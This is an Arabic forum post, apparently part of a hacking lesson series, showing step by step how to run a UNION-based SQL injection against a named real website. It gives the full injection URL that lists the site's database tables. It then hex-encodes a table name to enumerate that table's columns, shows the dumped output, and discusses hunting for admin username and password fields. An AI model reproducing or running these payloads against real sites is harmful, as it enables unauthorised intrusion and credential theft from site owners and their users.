في هيك مشكله بنجرب الدرس 17
انا جربت الخطوه الاولى
كود PHP:
http://www.cumbredecanpomeranias.com/noticias.php?id=33+and+1=0+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables
وبعد كده يطلع هذا
كود PHP:
albumes,
cachorros,
********os,
enlaces,
exposiciones,
fotos,
librovisitas_php
,noticias
,perros
,tipos_********os,
visitas,
ولا واحد منهم له علاقه ببيانات باسورد وادمن من الشكل الظاهري
اذا انت بدك الموقع وخايف يمر عليك شيء بتفتشهم كلهم كيف افتشهم هيك
بنمسك الاول ونشفره
0ْx616C62756D6573
خلينا نتابع
| اقتباس | | | | | |
تمام طلع لنا
| اقتباس | | | | | | | | |
albumes:id:cumbredebbdd
,albumes:album:cumbredebbdd,
albumes:id:cumbredebbdd-n,
albumes:album:cumbredebbdd-n
,albumes:id:cumbredebbdd-s,
albumes:album:cumbredebbdd-s | | | | | |
زي ما انت شايف فش فيهم باسورد ولا يوزر
كلها
id albom
وهذا سبب حصول الخطا لما نضع امر البحث عن الباسورد
انه فش كلمه اسمها
pass
موففق